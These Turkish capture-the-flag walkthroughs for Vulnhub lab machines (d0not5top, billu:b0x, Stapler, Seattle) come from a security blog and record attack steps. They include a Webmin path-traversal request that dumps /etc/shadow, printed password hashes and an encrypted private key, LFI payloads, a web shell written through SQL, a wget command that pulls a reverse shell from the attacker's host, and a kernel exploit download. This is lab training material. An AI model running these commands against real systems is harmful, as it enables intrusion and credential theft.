                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/programs/ ----
+ http://D0Not5topMe.ctf/manual/ko/programs/index.html (CODE:200|SIZE:5773)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/ssl/ ----
+ http://D0Not5topMe.ctf/manual/ko/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/developer/ ----
+ http://D0Not5topMe.ctf/manual/tr/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/faq/ ----
+ http://D0Not5topMe.ctf/manual/tr/faq/index.html (CODE:200|SIZE:3612)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/howto/ ----
+ http://D0Not5topMe.ctf/manual/tr/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/misc/ ----
+ http://D0Not5topMe.ctf/manual/tr/misc/index.html (CODE:200|SIZE:5339)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/mod/ ----
+ http://D0Not5topMe.ctf/manual/tr/mod/index.html (CODE:200|SIZE:22660)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/programs/ ----
+ http://D0Not5topMe.ctf/manual/tr/programs/index.html (CODE:200|SIZE:7405)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/ssl/ ----
+ http://D0Not5topMe.ctf/manual/tr/ssl/index.html (CODE:200|SIZE:5196)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/developer/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/faq/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/howto/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/misc/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/mod/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/programs/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833) 
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ssl/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)      
                                                                               
-----------------
END_TIME: Fri May 12 13:27:48 2017
DOWNLOADED: 433528 - FOUND: 96

Arkaplanda devam ederken kayıt olmaya çalıştım ve başlık bilgilerinde dikkatimi çeken kısım oldu.

http://d0not5topme.ctf/FLaR6yF1nD3rZ_html adresine baktığımızda;

+++++ +++[- >++++ ++++< ]>+++ +++.+ +++++ .<+++ +[->- ---<] >---- ----.
++.<+ +++++ [->++ ++++< ]>+++ ++.<+ +++++ [->-- ----< ]>--- ----. +++++
+.<++ +++++ [->++ +++++ <]>++ +.<++ +++++ [->-- ----- <]>-- ----- -----
-.++. <++++ ++[-> +++++ +<]>+ +++++ +++++ +.<++ ++[-> ++++< ]>+++ +.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ [->++ +++++ +<]>+ .++++ ++.<+
+++++ ++[-> ----- ---<] >---. <++++ +++[- >++++ +++<] >++++ +++++ ++++.
<+++[ ->--- <]>-- ---.< +++++ ++[-> ----- --<]> .+.+. ----- -.+++ +++++
+.-.- ---.< +++++ ++[-> +++++ ++<]> ..-.- .++++ +.++. +++++ ++++. <++++
+++[- >---- ---<] >---- ----- --.-- ---.< +++++ ++[-> +++++ ++<]> +++++
.<+++ [->++ +<]>+ +.++. --.++ .<+++ ++++[ ->--- ----< ]>--- ----- ---.<

Benim de bildim olmadığı için metni gruba sordum, öğrendim ki Brainfuck Gökay kardeşime teşekkür ederim. Ayrıca Çağatay’ın da reklamını yapalım.

https://github.com/cagataycali/awesome-brainfuck

Kodu çalıştırdğımızda flag karşımızda FL46_4:n02bv1rx5se4560984eedchjs72hsusu9 . Yalnız burda üçüncü bayrağı atladığımı farkediyorum. Sil baştan başladım ve smtp portunu gözden kaçırdığımı gördüm (Saatlerimi aldı).

nc -vv 172.189.64.225 25 komutu ile gelen dataya eriştim.

Hex olan datayı çözdüğümüzde aşağıdaki gibi sonuç çıktı.

46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a

FL46_3:29dryf67uheht2r1dd4qppuey474svxya

Sitede hata verdirtmeye çalışırken mail adresini gördüm ve yeni sitemizi bulmuş olduk.

Sitenin kaynağını incelerken game.js içinde yen bir adres buldum ve ordan devam ettim.

Gelen oyunda yine oyunu oynamak yerine kaynak koda baktım ve yeni adresi aldık.

Yeni siteyi /etc/hosts dosyasına ekledikten sonra terminalde kodları çalıştırmaya deniyorum. Parola t3rm1n4l.ctf onu bulduktan sonra

yeni adresi M36u574.ctf olarak buluyorum. Sitede resimler dışında veri bulamadım. Exif ve stenografi incelemesi yaparken “kingmegusta.jpg” resminin açıklamasında base64 veri gördüm.

TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kOTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JOUHhRbnlkc0x6UUd2WU9VODRCMm5ZL080MHBaMzAK

MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30

MeGustaKing:**********

Parolayı da hashcat ile çözdükten sonra ssh bağlantısı deniyorum. (Ki trollendik )

U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==

Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$&

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey

Aldığımız bilgilerle ssh bağlantısı için bruto force gerçekleştirdim.

Bundan sonrası en zorlandığım kısım oldu. Id, cat vs. komutlar çalışmadığı için ya echo “$(

Burdan sonra takıldım ve Linux enumeration scriptlerini denemeye başladım.

Çalıştırılabilir script olarak /usr/bin/wmstrt vardı. Çalıştırdığımda 20’den geriye sayarak “D1dyaCatchaT3nK1l0? ” verdiğim ingilizce tepkiyi burda yazmak isterdim
Biraz düşününce 10000 portunun aktif olduğunu gördüm. 20 saniye sonra servis durduğu için ufak bir araştırmayla for i in {1..1000..1};do echo $(/usr/bin/wmstrt); bu şekilde döngüye soktum.

Çalışan servisi açtığımda https bağlantısına işaret etti.

Ssl ile bağlantı yaptığımda WebAdmin çalıştığını gördüm ve zafiyetini bulmak zor olmadı

https://172.189.64.225:10000/unauthenticated/..%01/..%01/..%01/..%01/etc/shadow

root:$6$6BxJZ5xd$x84bX7slaDzCWbtdQxNjVC92B7YrXlBsUCYVpsoI.MFqcT1tnoTMgXTK6O8Pkm1I7pS/7FvgagDWdkpliygQw1:17260:0:99999:7:::
daemon:*:17253:0:99999:7:::
bin:*:17253:0:99999:7:::
sys:*:17253:0:99999:7:::
sync:*:17253:0:99999:7:::
games:*:17253:0:99999:7:::
man:*:17253:0:99999:7:::
lp:*:17253:0:99999:7:::
mail:*:17253:0:99999:7:::
news:*:17253:0:99999:7:::
uucp:*:17253:0:99999:7:::
proxy:*:17253:0:99999:7:::
www-data:*:17253:0:99999:7:::
backup:*:17253:0:99999:7:::
list:*:17253:0:99999:7:::
irc:*:17253:0:99999:7:::
gnats:*:17253:0:99999:7:::
nobody:*:17253:0:99999:7:::
systemd-timesync:*:17253:0:99999:7:::
systemd-network:*:17253:0:99999:7:::
systemd-resolve:*:17253:0:99999:7:::
systemd-bus-proxy:*:17253:0:99999:7:::
Debian-exim:!:17253:0:99999:7:::
messagebus:*:17253:0:99999:7:::
statd:*:17253:0:99999:7:::
avahi-autoipd:*:17253:0:99999:7:::
sshd:*:17253:0:99999:7:::
burtieo:$6$BBlsb/oG$Aw.HS4JQQ7RgwB.5puvo7yJvXpa5URKfHxUcFYJM42b0pTIkH8Dao3QYrSLADS7Ov4fstuOHHYF8K/Khvpbc//:17257:0:99999:7:::
pdns:!:17253:0:99999:7:::
mysql:!:17253:0:99999:7:::
MeGustaKing:$6$.owswwq.$CMShrXnYmTvT2naqaqCDfUyEYJp0B8MoaW5q4YqU1uOBFlE6xtOby1S7EVvmdqWO5Oe/a5lBog7LovMJC4e/9/:17259:0:99999:7:::
dnsmasq:*:17257:0:99999:7:::

Bu kadar aşamadan sonra eriştiğim o root parolası kırılmasa makinayı çözmeyi bırakacaktım. Root parolasını bulmaya çalışırken aklıma başka bir makinadaki yol geldi.
Public ve private key’i elde edip ( /root/.ssh/id_rsa ) bağlanmak.

/root/.ssh/id_rsa...

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7DA162212961C0CF94C636B47C991024

rDnUjh68EoasdaP40ta9QBeXtvB5uUVH9nKHKWo4KvhLcM4Z0/R6qvjSjlHir4LR
uhTb5Y+e2C7Wze8GlYbdGksFXbUztZec26vN7xH8Q4SeI++J77agqKWRE6jJ++hd
DsR7vDcqGbm9xX37BbE9Q4lLEHR/hNRe3/Ztrbt3obnCLvCW6H3kzpteycWAQQ3W
BaFns85p4AZn654HoIqX/UOkztdYxgOLgpzrLh9p1bRLiaOiBCrURkpYLspeKCNN
yfuPvNUgF1+uH78GlvLwfAA6XRj6HPDZ3D22/MxKcGixUVSPXjJlRpqyFQtvSM6T
cN5NmXjOjmzfgafqPqf7eTFfLChcsWHUmsSneq7pQhvw/vfeGX2kizuXCago+yWt
2IlFusQilfDDzybiunNOp+njD7TxeBLFcAUVdACfMUQ/fC0GHKeHB8q79Wi7r0SQ
m0eC6fIXJpDavN9PtPF2v+5OH9EDKycaeWMmWT0S0fNMmIhHb+U/uhtDjQx+M9fI
I5aBCjzCsDCoKT0qkv+dTafyqSzUN9EupCRh0NcsUT00yrQkxzM5L6C3H+61SNq8
CNi4I50aDp8q6m0KP/GZhUAU9Uegj+JZQ1h5MSnjOpOvKbD4l6/rWM02iFVAmg4O
WjSQfqbxGCmoHE8Y7iqgB8lRWnDYPssDXIMx+1pBkNkBASMpz6gJBZ//rJE1PkVr
aKdhbJFR1NX097z3HXS/7SBJmyuctG+JviH7mp1fH3WMAk2iu4nSiE1aNH1YV/nW
rXNOi5c7/yDE9o/weuJoCBL4VXeH89+l8551JOGU9RMuNk0pi/SSaUwwn7wR0/Yf
b9Sk3pbFDS64AON1T+4zlBWWif8aRMJ7Vm6zkDsE1Jq9nKcNzDknfufs45mKVzXU
m9dlGgzfNF46yPCuHzBZt4q1wrzg5/7gcWx5Qq6xD5VtWiMlB4G3D8DruaeqgTOi
Sh/jFqEOErA015Ympz/0Hh/lFn0NAAJy89BPG86d+VVAn5YstQEqH6zzuIy9mZ9K
853+0BUxA0I9rEessa+Q+NlFadBVE2FcJAr7rMsLGZFoqfvWxg5hBJFJ7jrjpQNe
Q9qzA/CbiMeU+zdifXZwprJR1fNVWalPJJGwotwVgXN/z4s8iN1gMN9y4Kynue9k
zQ/HqvgTkyX52ojLnM/PkXCyx7EXBAOJi5s6fv/22kcZ5Xkpw+x/VILPnJqObmU9
RZ3IB6kbckiMld5GX+xMvYi9rvmHf/mdLj75e7PU+FjCufApXAi+T10PnvMvrCGS
FkSlVyPPo1s4klTdrf2l6tkK6Lqu/7SamkvQvMsY7wnNT4OPI95y3GoRnwEFLd7w
honOroF1U6leA5O8jxSxI/CIwxvb5DO/sX4bZxShlhD98yO74ImAg5ACTj/eUaVA
/Q7bpfasSnqdKNWhx81pD6Ee9WeBZv8c0I0/EqS188O1qFYbtsaqZhYytTqYwvZ0
p6QuusMnDaA1nB8wL7ltKXt5PhBBxSVbUKtP6DWcBRviItFTsAnmK1QhD2wmTkCu
B8ochgwCgtAUs4cUXxnZrp5pu2yvu8Dhf//z8lBtoItPh5LTmW1N1g4s+9NKt72P
-----END RSA PRIVATE KEY-----

/root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPKVt8KEVrr80LT9ZwRsWG8w9O2vgWd99+2+xmi3WCgCR/IrhqoJqEhX9owwiaUUnyRWrj9AKDj8Neetju9rOCTJsvWAlfFgyrRXkOV9twpLcrML+LC5GsVGLH7U/R2sTpT9Ywad0yL+FTvHZ+AbYLFpml4Gbhat6Ynhcg3Q6XmxGHXkV9cd6/XCx74K8CKEtOye1REj8KDtsC329qvbp/9Dt1ZZQEAUFvLqgLJiZxmH5snWiszcO2TKQ3lUw3tLy5rA/bXe3Bf4zuEmktEuA0NW+FTLYELrBy/5PK007Uh0CQVpVS5C+tkLtqh6meAXPp7dhi/B6qGOIXpPxjpUjH root@D0Not5top

Kırdığım parolayı da kullanarak bağlantıyı sağlıyorum. ssh -i id_rsa [email protected] .

Sonuç:

Root dizininden de son flag çıkmış oldu.

######################################################
#                                                    #
#  W311 D0n3                                         #
#  Y0u D1d N0t5top                                   #
#  Much0 M3Gu5t4 :D                                  #
#                                                    #
#  3mrgnc3                                           #
#                                                    #
#  Hope you had fun...                               #
#  8ut...                                            #
#                                                    #
#  p.s..                                             #
#  571ll 1 M0r3 f146 :D                              #
#                                                    #
######################################################
 
FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk
N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS

Cidden zorlandığım ve bana katkısı olan bir makinaydı. Yapan arkadaş güzel yapmış. Kendisini tebrik etmek lazım ki ettim de

TR | d0not5top: 1.2 Walkthrough Berk İMRAN

TR | billu: b0x Walkthrough

Berk İMRAN — Sun, 23 Apr 2017 20:34:34 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Her ne kadar orta seviye makina dense de çözümü gayet kolay.

Makinamızın ip adresini nmap -sS -sV 192.168.43.1/24 (2 cihaz bağlı olduğunu bildiğim için bu şekilde yazdım) komutuyla öğrenelim.

Nmap scan report for indishell (192.168.43.120)
Host is up (0.000081s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for parrot (192.168.43.24)
Host is up (0.0000020s latency).
All 1000 scanned ports on parrot (192.168.43.24) are closed

22 ve 80 portlarının açık olduğunu görüyoruz. 80 portunda çalışan servise bakalım.

“Sqli yeteneği göster”i görünce burp suite ile sqli payloadlarını denettim. Ama kaynak koda baktığımda sayfa her yenilendiğinde çalışan “Tekrar Deneyiniz” yazısı bastıran script’i görünce troll olduğunu farkettim.

Diğer dizinlerden yola çıkmak adına dirb ile bruto force yaptırdım. Wordlist kullandım, phpmy dizini de vardı buraya ek olarak.

Sayfaları dolaşırken http://192.168.43.120/add adresinde dosya yükleme olduğunu gördüm ve filtre bypass ile shell atabilirim diye denedim. Yükleme yapmadı.

Test.php adresinde file parametresi ile komut çalıştırılabileceğini tahmin ettim.

curl -X POST –data “file=/etc/passwd” http://192.168.43.120/test komutu ile file parametresinden dosya okuyabildiğimizi farkettim.

Tekrar index.php’ye döndüğümde c.php dosyasını okuduğunu gördüm ve burdaki parolaları denediğimde yine giriş yapamadım.

Ssh portunun açık olduğunu ve phpmyadmin olduğunu düşününce config.inc.php dosyasını okudum ve bu bilgilerle ssh bağlantısı yaptım.

Root yetkisiyle giriş yaptık…

TR | billu: b0x Walkthrough Berk İMRAN

TR | Vulnhub Stapler – Walkthrough

Meryem Akdoğan — Tue, 21 Feb 2017 08:58:22 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Stapler zafiyetli makine için root olmamız isteniyor. Makineyi indirmek için;

https://download.vulnhub.com/stapler/Stapler.zip

Makineyi indirip sanal makineye attım. Artık teste başlayalım.

Öncelikle makinenin IP adresini belirlemem gerekiyordu. Bulunduğum ağdaki IP aralığındaki makineleri tespit ettim.

nbtscan 192.168.1.0/24

Sızmak istediğim makine IP adresi 192.168.1.53 olarak buluyorum. Makineye bir nmap taraması gerçekleştirip hangi portları açık onlara bakalım.

nmap  -sS -sV 192.168.1.53 -Pn -n -p-

Makine de 21 /ftp, 22/ ssh, 53/ domain, 80/ http, 139 / netbios-ssn, 666/doom, 3306/mysql, 12380/http portlarının açık halde olduğu ortaya çıktı.

Öncelikle http/80 portu açık olduğu için browser üzerinden buraya bakalım neler bulacağız. Buradan birşey çıkmıyor bir hata sayfası varmış.

O zaman bir de 12380 portuna bakalım. Biraz bunu kurcalayayım diyerek browser üzerinde baktığımda bir web sayfası açıldı.

Sayfayı kurcaladığımda birşeyler bulamadığımı fark ettim ve bu temayı araştırarak wordpress bir tema olduğunu buldum.

Bu web sayfası üzerinden giderek veri elde edebileceğimi düşünerek zafiyet aramaya başladım. Öncelikle işimi biraz kolaylaştırması amacıyla nikto aracından faydalandım.

nikto -h 192.168.1.53

Bu parametre ile aşağıdaki gibi bir çıktı verdi. /.bashrc ve /.profile dosyalarını indirdim ama içinden birşeyler çıkmadığını gördüm.

nikto -h 192.168.1.53 -p 12380

-p parametresi ile port belirterek bir tarama gerçekleştirdiğimde ise aşağıdaki gibi bir çıktı verdi.

Tarama sonucunda;

Server: Apache/2.4.18 (Ubuntu)
/blogblog , /admin112233 ve /phpmyadmin dizinlerini bulmuş oldum.

Bu dizinlerin varlığını kontrol etmeye kalktığımda,

192.168.1.53:12380/blogblog sayfasını görüntülemek istiyorum ama 192.168.1.53:12380 sayfasında kalıyor. Diğer dizinlerde de aynı şekilde olduğunu fark edince burada bir istek hatası olduğunu düşündüm.

***NOT: Buradaki önemli nokta https:// ile istek atmam gerektiğiydi.

https://192.168.1.53:12380/blogblog sayfasını görüntülemek istediğimde güvenli olduğunu belirterek açtım. İşte buuu!! Artık dizinler görüntülenebiliyooor.

Sayfaları biraz kurcalamaya başladım. Sonra bu web sayfasının wordpress olduğunu öğrendiğim için WPSCAN yardımıyla zafiyet taraması gerçekleştirdim.

wpscan https://192.168.1.53:12380/blogblog
- wpscan ile dizine bu şekilde tarama gerçekleştirebileceğimiz gibi daha specific sonuçlar elde etmek için enumarate parametreleri ekleyebiliriz.
- u ile tüm kullanıcıları
- vp ile zafiyetli pluginleri
- ap ile tüm pluginleri listeleyecek şekilde sonuç verecektir.

wpscan https://192.168.1.53:12380/blogblog —enumerate u
- Elde ettiğim wordpress kullanıcıları:
  - John, elly, peter, barry, heater, garry, harry, scott, kathy, tim

wpscan https://192.168.1.53:12380/blogblog —enumerate vp
- Akismet eklentisinde versiyon 2.5.0-3.1.4 arasında Stored XSS zafiyeti olduğunu ve 3.1.5 ile kapatıldığını söylüyordu.

wpscan https://192.168.1.53:12380/blogblog —enumerate ap
- Tüm eklentileri aradığımızda 4 tane eklenti kurulu olduğunu gördüm. Bunlar;
  - Advanced-video-embed-embed-videos-or-playlist – v1.0
  - Akismet
  - shortcode-ui -v0.6.2
  - two-factor
- Bu eklentilerde zafiyet olup olmadığını araştırdığımda kurulu olan Advanced Video 1.0 versiyonunda LFI (Local File Inclusion) zafiyeti olduğunu buldum.Exploit-DB Link : https://www.exploit-db.com/exploits/39646
- https://192.168.1.53:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlist/

Wpscan taramasında Advanced Video v1.0 eklentisi için exploit-db de yayınlanan zafiyetin bulunduğu adres üzerinden LFI deneyeyim diye düşündüm.

http://192.168.1.53:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
- wp-config.php okumak için her istek attığımda /blogblog/ dizini altına yeni bir post attığını ve bu postlarda ismi random sayılardan oluşan bir jpeg dosyası olduğunu fark ettim.

https://192.168.1.53:12380/blogblog/wp-content/uploads/
- Bu jpeg dosyalarının/uploads/ dizini altında her istekle arttığını fark ettim.

Bu farklı boyuttaki jpeg dosyalarını kendi makineme indirip bir inceleyeyim diye düşündüm.

curl -k https://192.168.1.53:12380/blogblog/wp-content/uploads/1388800993.jpeg > resimmi.jpeg
- Dosyayı indirerek yeni bir resim dosyasına attım.

file resimmi.jpeg
- Dosyanın aslında bir PHP dosyası olduğu gördüm.

cat resimmi.jpeg
- Dosyayı okuduğumda aslında wp-config.php dosyası olduğunu gördüm. Database bağlantısı gerçekleşiyor ayrıca içerisinde kullanıcı adı ve şifre bulunuyordu.

Şimdi phpmyadmin e giriş yapabilirim.

https://192.168.1.53:12380/phpmyadmin
- kullanıcı adı: root
- şifre : plbkac

Terminal üzerinden de mysql bağlantısı gerçekleştirerek veritabanlarına ulaşabiliyorum.
- mysql -u root -p -h 192.168.1.53
- show databases;

use wordpress
show tables;

select * from wp_users;
- WordPress kullanıcıları ve şifreleri hash halinde elde ettim.

Hash olarak elde ettiğim parolaları bir text dosyasına kaydediyorum ve John the Ripper aracı ile parolaları kırmaya çalışıyorum. Bulduğum parolalar;
john parola.txt
- football
- monkey
- cookie
- TOM
- thumb
- coolgil

Daha sonra [kullanıcıadı:parolahash] şeklinde dosyada düzenleme yapıp rockyou.txt wordlist vererek kırmaya başlıyorum(işlem saatlerce sürüyor). Sonuçta bulduğu parolaları kullanıcı adlarına göre veriyor.
John —wordlist=/usr/share/wordlists/rockyou.txt parola.txt
- washere (barry)
- incorrect (john)
- 0520 (pam)
- passphrase (heather)
- damachine (dave)
- partyqueen (zoe)

Bu kullanıcı adları ssh veya ftp bağlantısı gerçekleştirmek istediğimde kullanılabilir diye tek tek hepsini denedim fakat hiçbirisi ile başarılı bağlantı gerçekleştiremedim.

LFI zafiyeti bulunan adreste /etc/passwd dosyasınını da okumaya çalıştım. Ama hata ile karşılaştım.İşte bu güzel çünkü dizin yapısı geldi.

../../../../../../../../../etc/passwd dizinine gitmek istediğimde ise dizin hatasının ortadan kalkıyor ve yine bir post linkini veriyor.

/etc/passwd dosya okuması için attığım her istek sonucunda https://192.168.1.53:12380/blogblog sayfasında yine yeni bir post yayınlandı.

/blogblog/wp-content/uploads/ içerisinde postlar için atanan jpeg dosyalarından son oluşturulanı indirip inceleyeceğim.

curl -k https://192.168.1.53:12380/blogblog/wp-content/uploads/160095933.jpeg > s.jpeg
cat s.jpeg

Böylece /etc/passwd dosyasını görüntülemiş olduk.

Şimdi phpmyadmin de root olarak giriş yapabiliyorum. O zaman phpmyadmin yoluyla makineye bir shell.php dosyası yüklemeyi deneyebilirim.

Öncelikle Pentest Monkey Shell dosyası indiriyorum.

Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
İndirdiğim dosya içerinde ip ve port değerlerini değiştirmem gerekiyor.

Daha sonra SQL tarafında select “” INTO OUTFILE ‘/var/www/https/blogblog/uploads/shell.php sorgusunu çalıştırıyorum. Böylece /uploads/altına shell.php dosyası oluşturuyor.

Yüklenen bu dosya sayesinde wget komutunu kullanarak pentest monkey shell dosyasını kendi makinemden /uploads/ dizinine indiriyorum.
- https://192.168.1.53:12380/blogblog/wp-content/uploads/shell.php?cmd= wget 192.168.1.38:9090/meryem2.php

Netcat yardımıyla portu dinliyorum ve browser da meryem2.php shell dosyasına tıklayınca terminalde shell e düştüm.

nc -lvp 1337
- l: dinleme modu
- v: bilgi verme modu
- p: port bilgisi

Interactive shell almak için;
- python -c ‘import pty;pty.spawn(“/bin/bash”)’

Kullanıcı yetkisini öğrenmek için;
- $id

YETKİ YÜKSELTME

/home dizinine geçip tüm kullanıcıların /.bash_history dosyasını okuyabilirim.

cat */.bash_history
- /.bash_history okuduğumda peter ve JKanode kullanıcılarının ssh bağlantısı yaptığını ve parolalarını buldum.
  - sshpass -p thismypassword ssh JKanode@localhost
  - sshpass -p JZQuyIN5 peter@localhost

O zaman örnek olarak peter kullanıcısı için ssh bağlantısı gerçekleştirmeye çalışıyorum. Parola doğru ve giriş yapabildim.

id ile kullanıcının yetkisine bakıyorum.

sudo -i ile peter kullanıcısına root yetkisi verdiriyorum. Peter için aynı parolayı giriyorum ve artık root yetkilerine sahibim.

ls -la ile bakıyorum şimdi burada neler neler varmış. Bir flag.txt dosyası dikkatimi çekiyor.

cat flag.txt ile okuduğumda —–(:::Congratulations:::)—– flag karşımda

Yetki yükseltmek için başka bir yöntem de deneyebiliriz. Makineye shell attığımda kernel bilgilerini veriyordu.

Ama yine de biz bunu farklı yöntemlerle de öğrenebiliriz.

uname -a
lsb_release -a

Linux Kernel 4.4.0.21 araştırdığımda exploit-db de zafiyetinin yayınlandığını gördüm.

Exploit-DB Linki: https://www.exploit-db.com/exploits/39772/

Zafiyeti exploit edebileceğimiz script ise burada yer alıyor.

cd tmp
- /tmp dizininin altına gidiyoruz.
wget 192.168.1.36:9090/exploit.tar
- Kendi makineme indirdiğim exploit.tar dosyasını buraya çekiyorum.
tar -xf exploit.tar
- Sıkıştırılmış klasörü çıkartıyorum.

ebpf_mapfd_doubleput_exploit isimli bir klasör çıktı. Klasör içine giriyorum. Önce ./compile.sh dosyasını çalıştırıyorum.

Sonra ./doubleput dosyasını çalıştırıyorum. Ve artık root yetkilerine sahibim.

cd root
- root dizini altına gidiyorum ve dizinde bulunan dosya ve klasörleri listeliyorum.
cat flag.txt
- flag.txt dosyası dikkatimizi çekiyor ve açtığımda yine flag karşımda

TR | Vulnhub Stapler – Walkthrough Meryem Akdoğan

TR | Vulnhub Seattle v0.3 Walkthrough

Enes ERGÜN — Mon, 03 Oct 2016 21:15:34 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhaba arkadaşlar,

Bugün Vulnhub’da yayınlanan Seattle v0.3 makinesini çözmeye çalışacağız. Hemen başlayalım.

Önce indirdiğimiz makineyi VM yazılımınızla ayaklandırın. Makinenin kullanıcı adı root parolası ise PASSWORD

Saldırı yapacağımız hedef makinenin öncelikle IP adresini öğrenmemiz gerekiyor. Bunu network taramaları ile yapabilirsiniz. Makine elimizde olduğu için hızlıca makineye erişip Terminal’e

ifconfig

yazarak hedef sistemin IP adresini öğrenmiş olduk.

IP adresini öğrendikten sonra saldırı için bilgi toplama aşamasına geçebiliriz. Hedef sistem aynı ağda bulunduğu için öncelikli işimiz port taramak oluyor.

SYN taraması yaptığımızda aşağıda ki çıktı ile karşılaşıyoruz.

nmap -sS -sV 192.168.1.55

Göründüğü gibi sistemin 80 portu üzerinde Apache servisi çalışıyor. Bunun dışında bir sonuçla karşılaşmadık. O zaman IP adresine HTTP üzerinden bağlanalım. Tarayıcımıza IP adresini yazıp bağlandığımız da karşımıza Seattle Sounds başlığı bulunan bir site karşılıyor.

İlk aşamada port tarama işlemi sonucunda sadece 80 portunun açık olduğunu öğrendiğimiz için bu web sitesi üzerinden gitmemiz gerektiği kararına varabiliriz.

Siteyi hızlıca incelerken Catalogue adlı bir link ilgimi çekti. Bu linke tıklayınca web uygulaması bize bir pdf dosyası indirme bağlantısı sunuyor.

http://192.168.1.55/download.php?item=Brochure.pdf # linkimiz bu

Yukarıda ki link son kullanıcı için masum gözükse bile zarar vermek niyetinde olan kişiler için çokta sağlıklı bir yapıda değil.

Aşağıda ki gibi pdf dosyasının yerine linux dosya sisteminde kullanılan ve bir üst dizine çıkmayı belirten ” ../” karakterler ile linux sistemlerde kullanıcı kayıtlarını tutan passwd dosyasının yolunu yazdık ve karşımıza bu dosyanın içeriği geldi.

http://192.168.1.55/download.php?item=../../../../../../../../etc/passwd

Not: Burada geri gelme karakterlerini çok fazla kullanmamızın sebebi dizin yapısını tam olarak bilememizdir. İsterseniz yüzlerce kullanabilirsiniz linux tabanlı sistemlerde en üst dizin olan root dizinine çıkacaktır.

Aşağıda passwd dosyasının içeriğini görmektesiniz.

Kullandığımız bu açığın literatürde ki ismi Path Traversal/LFI ‘dir. Şimdi bir de web app penetration testlerinde çokça kullanılan nikto adlı araç ile web uygulamamızı bir kontrol edelim.

nikto -h http://192.168.1.55/ -o nicktoresults.txt

Şeklinde kodu terminalimize giriyoruz.Bu kodu açıklamak gerekirse -h argümanı hostname’i -o ise output u temsil eder. Yani -o argümani ile çıktılarımızı nicktoresults.txt diye bir txt dosyasına kaydediyoruz.

çıktı sonucu aşağıda ki gibidir.

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.1.55
+ Target Port: 80
+ GET Cookie level created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.6.14
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ VYUPBYCA Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
